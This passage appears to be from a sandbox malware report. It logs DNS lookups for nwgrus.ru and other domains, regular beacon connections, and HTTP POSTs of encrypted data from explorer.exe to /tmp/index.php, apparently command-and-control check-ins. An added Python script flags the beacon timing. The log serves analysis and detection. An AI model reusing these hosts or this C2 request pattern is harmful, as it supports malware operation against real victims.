Oct 8, 2024 03:17:34.326560020 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:34.326586962 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:34.327075005 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:34.327905893 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:34.327929020 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:34.328038931 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:34.688065052 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:34.688141108 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:34.688190937 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:34.688577890 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:34.688594103 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:34.688604116 CEST | 50065 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:34.688607931 CEST | 443 | 50065 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:37.704230070 CEST | 50066 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:37.709774017 CEST | 80 | 50066 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:37.709852934 CEST | 50066 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:37.710000992 CEST | 50066 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:37.710035086 CEST | 50066 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:37.714900970 CEST | 80 | 50066 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:37.714931011 CEST | 80 | 50066 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:38.839585066 CEST | 80 | 50066 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:38.839687109 CEST | 80 | 50066 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:38.839751005 CEST | 50066 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:38.839998007 CEST | 50066 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:38.845041037 CEST | 80 | 50066 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:51.239928007 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:51.240014076 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:51.240080118 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:51.240350008 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:51.240382910 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:51.832901955 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:51.833117008 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:51.833997965 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:51.834021091 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:51.834602118 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:51.835235119 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:51.835274935 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:51.835494995 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:52.198797941 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:52.198945045 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:52.199021101 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:52.199141026 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:52.199183941 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:52.199208975 CEST | 50067 | 443 | 192.168.2.4 | 23.145.40.168
Oct 8, 2024 03:17:52.199223995 CEST | 443 | 50067 | 23.145.40.168 | 192.168.2.4
Oct 8, 2024 03:17:55.120667934 CEST | 50068 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:55.125875950 CEST | 80 | 50068 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:55.126094103 CEST | 50068 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:55.126094103 CEST | 50068 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:55.126184940 CEST | 50068 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:55.131198883 CEST | 80 | 50068 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:55.131253004 CEST | 80 | 50068 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:56.256889105 CEST | 80 | 50068 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:56.256937027 CEST | 80 | 50068 | 201.103.8.135 | 192.168.2.4
Oct 8, 2024 03:17:56.257177114 CEST | 50068 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:56.262687922 CEST | 50068 | 80 | 192.168.2.4 | 201.103.8.135
Oct 8, 2024 03:17:56.267676115 CEST | 80 | 50068 | 201.103.8.135 | 192.168.2.4
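The TCP rows above show the sample opening a fresh connection to 23.145.40.168:443 and to 201.103.8.135:80 roughly every 18 seconds, alternating between the two. That regular cadence, not any single packet, is what a detection engineer would key on. The following script is an added example and not Joe Sandbox code: it takes connection-start rows in the table's own column order, computes the interval between successive connections to each destination and flags destinations whose interval jitter is low. The rows are constructed from the table above (only the first packets of each connection are copied), and the analysis VM is assumed to be 192.168.2.4 because every client-side connection in the table originates there.

```python
"""Beacon-interval check over Joe Sandbox "TCP Packets" rows.

Added example, not Joe Sandbox code.  ROWS is constructed from the report's
TCP table; SANDBOX_HOST is an assumption drawn from the table itself.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SANDBOX_HOST = "192.168.2.4"  # assumption: the analysis VM in this report

# (Timestamp, Source Port, Dest Port, Source IP, Dest IP), as printed in the report
ROWS = [
    ("Oct 8, 2024 03:17:15.665441990 CEST", 50063, 443, "192.168.2.4", "23.145.40.168"),
    ("Oct 8, 2024 03:17:15.665451050 CEST", 443, 50063, "23.145.40.168", "192.168.2.4"),
    ("Oct 8, 2024 03:17:16.302692890 CEST", 443, 50063, "23.145.40.168", "192.168.2.4"),
    ("Oct 8, 2024 03:17:19.592775106 CEST", 50064, 80, "192.168.2.4", "201.103.8.135"),
    ("Oct 8, 2024 03:17:19.597774029 CEST", 80, 50064, "201.103.8.135", "192.168.2.4"),
    ("Oct 8, 2024 03:17:33.681612015 CEST", 50065, 443, "192.168.2.4", "23.145.40.168"),
    ("Oct 8, 2024 03:17:34.322112083 CEST", 443, 50065, "23.145.40.168", "192.168.2.4"),
    ("Oct 8, 2024 03:17:37.704230070 CEST", 50066, 80, "192.168.2.4", "201.103.8.135"),
    ("Oct 8, 2024 03:17:51.239928007 CEST", 50067, 443, "192.168.2.4", "23.145.40.168"),
    ("Oct 8, 2024 03:17:55.120667934 CEST", 50068, 80, "192.168.2.4", "201.103.8.135"),
]


def parse_ts(text):
    """Joe Sandbox timestamps carry nine fractional digits and a zone name;
    strptime accepts at most six digits, so the fraction is split off and
    re-added as nanoseconds.  Only differences between stamps are used."""
    stamp, _zone = text.rsplit(" ", 1)          # drop the trailing "CEST"
    whole, frac = stamp.rsplit(".", 1)
    base = datetime.strptime(whole, "%b %d, %Y %H:%M:%S")
    return base.timestamp() + int(frac.ljust(9, "0")[:9]) / 1e9


def connection_starts(rows, client=SANDBOX_HOST):
    """Map (dest_ip, dest_port) -> sorted connection start times.
    The first packet seen for a given client source port marks a new TCP
    connection; server->client packets are ignored."""
    seen = set()
    starts = defaultdict(list)
    for ts, sport, dport, sip, dip in rows:
        key = (sport, dip, dport)
        if sip != client or key in seen:
            continue
        seen.add(key)
        starts[(dip, dport)].append(parse_ts(ts))
    return {dst: sorted(times) for dst, times in starts.items()}


def interval_stats(times):
    """Mean gap between consecutive connections and its relative jitter
    (population stdev / mean).  Needs at least three connections."""
    if len(times) < 3:
        return None
    gaps = [b - a for a, b in zip(times, times[1:])]
    period = mean(gaps)
    return round(period, 1), round(pstdev(gaps) / period, 3)


def find_beacons(rows, max_jitter=0.2, min_connections=3):
    """Destinations contacted at a regular cadence.  Low jitter across
    several connections is the signature of a timer-driven check-in rather
    than user-driven traffic."""
    hits = {}
    for dst, times in connection_starts(rows).items():
        stats = interval_stats(times)
        if stats and len(times) >= min_connections and stats[1] <= max_jitter:
            hits[dst] = stats
    return hits


if __name__ == "__main__":
    for (ip, port), (period, jitter) in find_beacons(ROWS).items():
        print(f"{ip}:{port}  period={period}s  jitter={jitter}")
```

On these rows both destinations come out with a period of about 17.8 s and jitter near 0.01 to 0.02. Three connections is the minimum for a meaningful jitter figure; on a longer capture, lower `max_jitter` and raise `min_connections` to cut false positives from software updaters, which also poll on timers.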
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 03:14:18.512068033 CEST | 64635 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:14:19.514327049 CEST | 64635 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:14:20.524640083 CEST | 64635 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:14:20.790242910 CEST | 53 | 64635 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 03:14:20.790278912 CEST | 53 | 64635 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 03:14:20.790297985 CEST | 53 | 64635 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 03:15:18.569936037 CEST | 59993 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:15:18.582319975 CEST | 53 | 59993 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 03:16:58.926079988 CEST | 62908 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:16:59.930843115 CEST | 62908 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:17:00.946425915 CEST | 62908 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:17:01.161866903 CEST | 53 | 62908 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 03:17:01.161910057 CEST | 53 | 62908 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 03:17:01.161937952 CEST | 53 | 62908 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 03:18:03.310151100 CEST | 60746 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:18:03.325584888 CEST | 53 | 60746 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 03:14:18.512068033 CEST | 192.168.2.4 | 1.1.1.1 | 0xdfd5 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:19.514327049 CEST | 192.168.2.4 | 1.1.1.1 | 0xdfd5 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.524640083 CEST | 192.168.2.4 | 1.1.1.1 | 0xdfd5 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:15:18.569936037 CEST | 192.168.2.4 | 1.1.1.1 | 0x9293 | Standard query (0) | ninjahallnews.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:16:58.926079988 CEST | 192.168.2.4 | 1.1.1.1 | 0x7da8 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:16:59.930843115 CEST | 192.168.2.4 | 1.1.1.1 | 0x7da8 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:00.946425915 CEST | 192.168.2.4 | 1.1.1.1 | 0x7da8 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:18:03.310151100 CEST | 192.168.2.4 | 1.1.1.1 | 0xbfa6 | Standard query (0) | globalviewsnature.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 03:14:12.590634108 CEST | 1.1.1.1 | 192.168.2.4 | 0x2e4 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:12.590634108 CEST | 1.1.1.1 | 192.168.2.4 | 0x2e4 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:13.098494053 CEST | 1.1.1.1 | 192.168.2.4 | 0x34dd | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 03:14:13.098494053 CEST | 1.1.1.1 | 192.168.2.4 | 0x34dd | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 180.75.11.133 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 187.204.9.111 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 125.7.253.10 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 185.18.245.58 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 190.146.112.188 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 190.156.239.49 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 177.129.90.106 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 105.197.97.247 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 175.119.10.231 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790242910 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 183.100.39.16 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 180.75.11.133 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 187.204.9.111 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 125.7.253.10 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 185.18.245.58 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 190.146.112.188 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 190.156.239.49 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 177.129.90.106 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 105.197.97.247 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 175.119.10.231 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790278912 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 183.100.39.16 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 180.75.11.133 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 187.204.9.111 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 125.7.253.10 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 185.18.245.58 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 190.146.112.188 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 190.156.239.49 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 177.129.90.106 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 105.197.97.247 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 175.119.10.231 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:20.790297985 CEST | 1.1.1.1 | 192.168.2.4 | 0xdfd5 | No error (0) | nwgrus.ru | - | 183.100.39.16 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:14:53.975908995 CEST | 1.1.1.1 | 192.168.2.4 | 0xc212 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 03:14:53.975908995 CEST | 1.1.1.1 | 192.168.2.4 | 0xc212 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:15:18.582319975 CEST | 1.1.1.1 | 192.168.2.4 | 0x9293 | No error (0) | ninjahallnews.com | - | 23.145.40.168 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:01.161866903 CEST | 1.1.1.1 | 192.168.2.4 | 0x7da8 | No error (0) | nwgrus.ru | - | 201.103.8.135 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:01.161866903 CEST | 1.1.1.1 | 192.168.2.4 | 0x7da8 | No error (0) | nwgrus.ru | - | 196.189.156.245 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:01.161866903 CEST | 1.1.1.1 | 192.168.2.4 | 0x7da8 | No error (0) | nwgrus.ru | - | 154.144.253.197 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:01.161866903 CEST | 1.1.1.1 | 192.168.2.4 | 0x7da8 | No error (0) | nwgrus.ru | - | 211.171.233.129 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:01.161866903 CEST | 1.1.1.1 | 192.168.2.4 | 0x7da8 | No error (0) | nwgrus.ru | - | 177.129.90.106 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:01.161866903 CEST | 1.1.1.1 | 192.168.2.4 | 0x7da8 | No error (0) | nwgrus.ru | - | 187.204.9.111 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:01.161866903 CEST | 1.1.1.1 | 192.168.2.4 | 0x7da8 | No error (0) | nwgrus.ru | - | 190.156.239.49 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:17:01.161866903 CEST | 1.1.1.1 | 192.168.2.4 | 0x7da8 | No error (0) | nwgrus.ru | - | 186.123.165.48 | A (IP address) | IN (0x0001) | false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:18:03.325584888 CEST1.1.1.1192.168.2.40xbfa6No error (0)globalviewsnature.com23.145.40.113A (IP address)IN (0x0001)false
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49736        180.75.11.133   80                2580  C:\Windows\explorer.exe

Timestamp                            Bytes transferred  Direction  Data (on the indented lines that follow)
Oct 8, 2024 03:14:20.830836058 CEST  281                OUT
    POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://arlhmhxchhgqep.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 336
    Host: nwgrus.ru
Oct 8, 2024 03:14:20.830836058 CEST  336                OUT
    Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 32 be bc
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vuF2oL~{Lzmyr/ulRKBi66=F@TG*X3~(E!dHFH3X$zCQ!|d^I4@;
Oct 8, 2024 03:14:22.194552898 CEST  152                IN
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:21 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 04 00 00 00 72 e8 87 ec
    Data Ascii: r


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49737        180.75.11.133   80                2580  C:\Windows\explorer.exe

Timestamp                            Bytes transferred  Direction  Data (on the indented lines that follow)
Oct 8, 2024 03:14:22.204900980 CEST  280                OUT
    POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://tdpshksrvfora.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 333
    Host: nwgrus.ru
Oct 8, 2024 03:14:22.204952955 CEST  333                OUT
    Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 66 05 cc a5
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vufpDhD/7=0S ~$E(*nR2CQ`31?05$'&o4XKNG w2$`/]"CD
Oct 8, 2024 03:14:23.607597113 CEST  484                IN
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:23 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49738        180.75.11.133   80                2580  C:\Windows\explorer.exe

Timestamp                            Bytes transferred  Direction  Data (on the indented lines that follow)
Oct 8, 2024 03:14:23.615633965 CEST  279                OUT
    POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://uhxuuwgfmyhe.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 163
    Host: nwgrus.ru
Oct 8, 2024 03:14:23.615633965 CEST  163                OUT
